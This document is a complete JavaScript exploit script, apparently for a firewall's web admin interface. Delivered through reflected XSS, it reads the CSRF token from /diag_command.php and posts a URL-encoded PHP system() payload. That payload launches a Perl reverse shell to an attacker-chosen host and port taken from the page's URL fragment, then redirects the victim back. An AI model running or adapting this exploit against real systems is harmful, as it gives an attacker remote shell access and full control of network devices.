// Function Ajax without JQuery library
function ajax(url, method, data, async){
    method = typeof method !== 'undefined' ? method : 'GET';
    async = typeof async !== 'undefined' ? async : false;
    if(window.XMLHttpRequest)
        var xhReq = new XMLHttpRequest();
    else
        var xhReq = new ActiveXObject("Microsoft.XMLHTTP");

    if(method == 'POST'){
        xhReq.open(method, url, async);
        xhReq.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        xhReq.setRequestHeader("X-Requested-With", "XMLHttpRequest");
        xhReq.send(data);
    } else {
        if(typeof data !== 'undefined' && data !== null)
            url = url+'?'+data;
        xhReq.open(method, url, async);
        xhReq.setRequestHeader("X-Requested-With", "XMLHttpRequest");
        xhReq.send(null);
    }
    var serverResponse = xhReq.responseText;
	return serverResponse;
}

var hash = window.location.hash.substring(1);
var lhostlport = hash.substring(hash.indexOf("lhostlport=")+11, hash.indexOf("&"));
var splitlhostlport = lhostlport.split(":");
var lhost = splitlhostlport[0];
var lport = splitlhostlport[1];
var redir = hash.substring(hash.indexOf("redir=")+6, hash.length);

var payload='system%28%27%2fusr%2flocal%2fbin%2fperl%20-e%20%5C%27use%20Socket%3B%24i%3D%22' + lhost + '%22%3B%24p%3D' + lport + '%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2fbin%2fsh%20-i%22%29%3B%7D%3B%5C%27%26%27%29%3B';

// Function with AJAX request
// This function requests in GET an internal WebGUI page, which contains the token.
// Source code of this webpage is passed to the extractToken() function.
function loadToken(){
	var response = ajax('/diag_command.php');
	extractToken(response);
}
 
// Function called after AJAX request in a defined page of the context, which contains the token value
function extractToken(response){
	// response var contains the source code of the page requested by AJAX
	// Regex to catch the token value
	var regex = new RegExp("<input type='hidden' name='__csrf_magic' value=\"(.*)\" />",'gi');
	var token = response.match(regex);
	token = RegExp.$1;
	// Pass the token to the final function which make the CSRF final attack
	makeCSRF(token);
}
 
// Function with AJAX request
// The token var is needed to perform the right CSRF attack with the context referer
function makeCSRF(token){
	// Final CSRF attack with right referer (because executed in the context)
	// and with right token captured above
	var response = ajax('/diag_command.php', 'POST', 'txtCommand=&txtRecallBuffer=&dlPath=&ulfile=&txtPHPCommand=' + payload + '&submit=EXECPHP&__csrf_magic=' + token);
	// Finally, redirect back to the intial hooked page
	document.location=decodeURIComponent(redir);
}

// The Reflected XSS is triggered several time. The next code force the RXSS firering only one time
if (trigger){
} else {
    var trigger = function(){
		loadToken();
	};
	trigger();
}
